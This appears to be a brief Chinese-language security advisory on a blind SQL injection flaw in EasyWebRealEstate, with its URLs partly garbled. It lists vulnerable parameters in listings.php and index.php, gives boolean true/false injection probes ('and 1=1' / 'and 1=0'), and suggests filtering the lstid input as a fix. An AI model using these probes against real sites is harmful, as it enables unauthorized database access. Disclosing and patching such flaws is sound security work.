标题: EasyWebRealEstate Blind SQL Injection Vulnerabilitiy 作者: H4ckCity Security Team farbodmahini HdhCmsTest2cto测试数据 WwW.H4ckCity.Org 软件地址: HdhCmsTesteasywebrealestate测试数据 影响所有版本: All Version 测试平台: GNU/ Linux Ubuntu - Windows Server - win7 ############################################################################ 示例 # http://HdhCmsTest2cto测试数据 /[patch]/listings.php?lstid=1 [Blind SQL] # http://HdhCmsTest2cto测试数据 /[patch]/index.php?current=tip&infoid=9' [Blind SQL] # # # Test Blind SQL Injection: # # # [-] False # # http://HdhCmsTest2cto测试数据 /[patch]/listings.php?lstid=1 and 1=0 # # [+] True # # http://HdhCmsTest2cto测试数据 /[patch]/listings.php?lstid=1 and 1=1 # # 修复 过滤listings.php页面lstid参数输入 #
查看更多关于EasyWebRealEstate盲注缺陷及修复 - 网站安全 - 自学的详细内容...